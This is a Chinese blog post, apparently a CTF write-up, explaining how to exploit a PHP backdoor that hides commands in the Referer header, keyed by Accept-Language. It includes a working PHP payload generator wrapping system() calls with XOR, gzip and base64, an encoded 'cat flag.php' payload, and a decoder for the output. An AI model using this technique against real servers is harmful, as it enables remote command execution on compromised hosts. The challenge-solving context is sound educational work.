<p>看完代码的作用之后，先来说一下大体流程：<br><strong>获取参数-&gt;提取参数值-&gt;解码-&gt;执行-&gt;结果加密-&gt;输出</strong><br>所以我们主要解决的问题就是怎么把我们的payload通过参数传进去，和加解密，由于加解密的方法使用的是同一个，所以我们知道如何加密也就知道如何解密了。</p>
<p>我们可控制的参数有两个，一个是referer一个是accept-language。从代码来看referer·的内容是用来执行的，但是怎么获取referer里面的值是通过accept-language来计算的。</p>
<p>所以简单说referer的值里面包含我们的payload，language控制获取。</p>
<p>所以我们先要搞清楚怎么把1传进去让它正常获取，就能知道如何把payload放进去了。也就是我们的第一个目标是accept-language。</p>
<p>可以本地运行一下backdoor.php通过Burp suite来修改accept-language的值看看，通过正则表达式转换后的m数组是什么。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Array ( [0] =&gt; Array ( [0] =&gt; zh-CN, [1] =&gt; zh;q=0.9 ) [1] =&gt; Array ( [0] =&gt; z [1] =&gt; z ) [2] =&gt; Array ( [0] =&gt; [1] =&gt; 9 ) )</span><br></pre></td></tr></table></figure></p>
<p>这是language设置为 <strong>zh-CN,zh;q=0.9</strong> 。简单说一下就是每个默认语言用，隔开第一个是默认语言，q代表权重。有了上边的输出结果，后边的取值就很清楚了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for ($z = 1; $z &lt; count($m[1]); $z++) $p.= $q[$m[2][$z]];	//p是对q[$m[2][$z]的拼接</span><br></pre></td></tr></table></figure></p>
<p>这段代码现在来看就不难分析了，按照上边的测试情况的话，p的取值应该是q[]和q[9];所以我们只需要修改language让它取比如0的话，那么我们可以把referer的值构造为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.example.com/backdoor.php?a=payload</span><br></pre></td></tr></table></figure></p>
<p>这样p的取值就是参数0也就是第一个参数即a的值。同时经过测试发现<strong>zh-CN,zh;q=0.0</strong>恰好为我们需要的参数值<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Array ( [0] =&gt; Array ( [0] =&gt; zh-CN, [1] =&gt; zh;q=0.0 ) [1] =&gt; Array ( [0] =&gt; z [1] =&gt; z ) [2] =&gt; Array ( [0] =&gt; [1] =&gt; 0 ) )</span><br></pre></td></tr></table></figure></p>
<p>从下面连续两个if判断来看，第一个if是需要我们满足payload的开头三个字符是h变量，这样s才会置空，并正确与后边的payload在第二个if里面进行拼接。同时eval函数里面对后边的字符进行了切除，切除部分恰好就是f。</p>
<p>所以我们的payload需要满足头尾分别是h和f。所以我们需要输出一下这两个的值。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">6b3</span><br><span class="line">ebc</span><br></pre></td></tr></table></figure></p>
<p>现在我们的payload更进一步了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.example.com/backdoor.php?a=6b3payloadebc</span><br></pre></td></tr></table></figure></p>
<p>接下来的事情反而简单了，关于异或运算可以通过a = b ^ c那么 b = a ^ c的逆运算来解决。<br>然后使用PHP的 <strong>base64_decode()、base64_encode()、gzcompress()、gzuncompress()</strong> ，四个函数分别来进行加解密，压缩，解压。</p>
<p>于是构造payload的代码就是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function x($t,$k) &#123; </span><br><span class="line">    $c=strlen($k); </span><br><span class="line">    $l=strlen($t); </span><br><span class="line">    $o=&quot;&quot;; </span><br><span class="line">    for($i=0; $i&lt;$l;) &#123;</span><br><span class="line">        for($j=0; ($j&lt;$c&amp;&amp;$i&lt;$l); $j++,$i++) &#123; </span><br><span class="line">            $o.= $t&#123;$i&#125; ^ $k&#123;$j&#125;; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    return $o; </span><br><span class="line">&#125;</span><br><span class="line">function payload($cmd)&#123;</span><br><span class="line">    $str = &apos;system(&quot;&apos; . $cmd . &apos;&quot;);&apos;;</span><br><span class="line">    $t = gzcompress($str);</span><br><span class="line">    $t = x($t, &apos;d03a1f3c&apos;);</span><br><span class="line">    $t = base64_encode($t);</span><br><span class="line">    echo &quot;6b3&quot;.$t . &quot;ebc&lt;br&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">payload(&apos;指令&apos;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/04/16/后门利用题目/Image0004.png" alt></p>
<p>通过引入错误页面可以看到服务器系统是Debian。所以我们要读取文件的话要用的指令是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php</span><br></pre></td></tr></table></figure></p>
<p>该指令通过自己的脚本生成的结果是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">6b3HKwYzx1Ieq6xYHkvHTd7qC185Er5TmOx0DYzBKhh7Q==ebc</span><br></pre></td></tr></table></figure></p>
<p>记得传递payload的时候确定language是<strong>zh-CN,zh;q=0.0</strong><br><img src="/2019/04/16/后门利用题目/Image0005.png" alt><br>结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKyA0B6uG4OB4uQ2YS/4KihngzRhYeK29TaSkHSXeibtVZqQFGDCpp22cydwN00x6oFczItTHHRkzkZzAw==</span><br></pre></td></tr></table></figure>
<p>看来后门程序运行了，把经过加密的结果给我们了。</p>
<p>我们现在只需要解码就可以了，怎么解已经说过了，下面上代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function x($t,$k) &#123; </span><br><span class="line">    $c=strlen($k); </span><br><span class="line">    $l=strlen($t); </span><br><span class="line">    $o=&quot;&quot;; </span><br><span class="line">    for($i=0; $i&lt;$l;) &#123;</span><br><span class="line">        for($j=0; ($j&lt;$c&amp;&amp;$i&lt;$l); $j++,$i++) &#123; </span><br><span class="line">            $o.= $t&#123;$i&#125; ^ $k&#123;$j&#125;; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    return $o; </span><br><span class="line">&#125;</span><br><span class="line">function get_answer($str)&#123;</span><br><span class="line">    $str = base64_decode($str);</span><br><span class="line">    $str = x($str, &apos;d03a1f3c&apos;);</span><br><span class="line">    $str = gzuncompress($str);</span><br><span class="line">    echo $str . &quot;&lt;br&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">get_answer(&apos;需要解密的内容&apos;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>这段代码是没有任何问题的，但是你会发现怎么也解不出来结果，这个地方我困扰了很长时间，考虑了各个环节，最终发现是出题者“皮”了一下，我们的代码跟思路没有任何问题，问题在于我们的linux指令，cat 是正序输出文件，tac是倒叙，这里出题者设置了一个小坎就是flag的内容是倒叙的，所以把linux指令换成<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tac flag.php</span><br></pre></td></tr></table></figure></p>
<p>重复上述步骤后得到<br><img src="/2019/04/16/后门利用题目/Image0006.png" alt></p>

      
    </div>
    
    
    
	
	<div>
	
		<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
	
	</div>
	
	<div>
      
        
      
	</div>

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/15/PHP利用文件包含漏洞/" rel="next" title="PHP利用文件包含漏洞">
                <i class="fa fa-chevron-left"></i> PHP利用文件包含漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/head.png" alt="Kiona">
            
              <p class="site-author-name" itemprop="name">Kiona</p>
              <p class="site-description motion-element" itemprop="description">Information Security</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/KKKiona" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://weibo.com/6069457935/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://weibo.com/6069457935/profile?rightmod=1&wvr=6&mod=personinfo" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-weibo"></i>微博</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                推荐阅读
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://example.com/" title="Title" target="_blank">Title</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kiona</span>
  
  
    <!--<span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">16.6k</span>-->
  <span class="post-meta-divider">|</span>
  <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
  </span>
  <div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共 16.6k 字</span>
  </div>
  
</div>

<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>



  
-->
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"> 访客人数</i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"> 总访问量</i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>
  <link rel="stylesheet" href="https://kkkiona.github.io/live2d/css/live2d.css">
<div id="landlord" style="left:5px;bottom:0px;">
    <div class="message" style="opacity:0"></div>
    <canvas id="live2d" width="500" height="560" class="live2d"></canvas>
    <div class="live_talk_input_body">
    	<div class="live_talk_input_name_body">
        	<input name="name" type="text" class="live_talk_name white_input" id="AIuserName" autocomplete="off" placeholder="你的名字">
        </div>
        <div class="live_talk_input_text_body">
        	<input name="talk" type="text" class="live_talk_talk white_input" id="AIuserText" autocomplete="off" placeholder="要和我聊什么呀？">
            <button type="button" class="live_talk_send_btn" id="talk_send">发送</button>
        </div>
    </div>
    <input name="live_talk" id="live_talk" value="1" type="hidden">
    <div class="live_ico_box">
    	<div class="live_ico_item type_info" id="showInfoBtn"></div>
    	<div class="live_ico_item type_talk" id="showTalkBtn"></div>
        <div class="live_ico_item type_music" id="musicButton"></div>
        <div class="live_ico_item type_youdu" id="youduButton"></div>
        <div class="live_ico_item type_quit" id="hideButton"></div>
        <input name="live_statu_val" id="live_statu_val" value="0" type="hidden">
        <audio src style="display:none;" id="live2d_bgm" data-bgm="0" preload="none"></audio>
        <input name="live2dBGM" value="https://t1.aixinxi.net/o_1c52p4qbp15idv6bl55h381moha.mp3" type="hidden">
        <input name="live2dBGM" value="https://t1.aixinxi.net/o_1c52p8frrlmf1aled1e14m56una.mp3" type="hidden">
        <input id="duType" value="douqilai,l2d_caihong" type="hidden">
    </div>
</div>
<div id="open_live2d">召唤Koharu</div>
<script type="text/javascript" src="https://apps.bdimg.com/libs/jquery/1.7.1/jquery.min.js"></script>
<script>
var message_Path = '/live2d/';//资源目录，如果目录不对请更改
var talkAPI = "http://openapi.tuling123.com/openapi/api/v2";//如果有类似图灵机器人的聊天接口请填写接口路径
</script>
<script type="text/javascript" src="https://kkkiona.github.io/live2d/js/live2d.js"></script>
<script type="text/javascript" src="https://kkkiona.github.io/live2d/js/message.js"></script>
  
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("2FN2TXFOFjm0h8iAd67MXX1G-gzGzoHsz", "GGQ0dikj6qTJINB1OB4n442p");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
  <script src="https://www.gstatic.com/firebasejs/4.6.0/firebase.js"></script>
  <script src="https://www.gstatic.com/firebasejs/4.6.0/firebase-firestore.js"></script>
  
  <script>
    (function () {

      firebase.initializeApp({
        apiKey: '',
        projectId: ''
      })

      function getCount(doc, increaseCount) {
        //increaseCount will be false when not in article page

        return doc.get().then(function (d) {
          var count
          if (!d.exists) { //has no data, initialize count
            if (increaseCount) {
              doc.set({
                count: 1
              })
              count = 1
            }
            else {
              count = 0
            }
          }
          else { //has data
            count = d.data().count
            if (increaseCount) {
              if (!(window.localStorage && window.localStorage.getItem(title))) { //if first view this article
                doc.set({ //increase count
                  count: count + 1
                })
                count++
              }
            }
          }
          if (window.localStorage && increaseCount) { //mark as visited
            localStorage.setItem(title, true)
          }

          return count
        })
      }

      function appendCountTo(el) {
        return function (count) {
          $(el).append(
            $('<span>').addClass('post-visitors-count').append(
              $('<span>').addClass('post-meta-divider').text('|')
            ).append(
              $('<span>').addClass('post-meta-item-icon').append(
                $('<i>').addClass('fa fa-users')
              )
              ).append($('<span>').text('阅读次数 ' + count))
          )
        }
      }

      var db = firebase.firestore()
      var articles = db.collection('articles')

      //https://hexo.io/zh-tw/docs/variables.html
      var isPost = '后门利用题目'.length > 0
      var isArchive = '' === 'true'
      var isCategory = ''.length > 0
      var isTag = ''.length > 0

      if (isPost) { //is article page
        var title = '后门利用题目'
        var doc = articles.doc(title)

        getCount(doc, true).then(appendCountTo($('.post-meta')))
      }
      else if (!isArchive && !isCategory && !isTag) { //is index page
        var titles = [] //array to titles

        var postsstr = '' //if you have a better way to get titles of posts, please change it
        eval(postsstr)

        var promises = titles.map(function (title) {
          return articles.doc(title)
        }).map(function (doc) {
          return getCount(doc)
        })
        Promise.all(promises).then(function (counts) {
          var metas = $('.post-meta')
          counts.forEach(function (val, idx) {
            appendCountTo(metas[idx])(val)
          })
        })
      }
    })()
  </script>


  

  
  

  

  

  

</body>
</html>
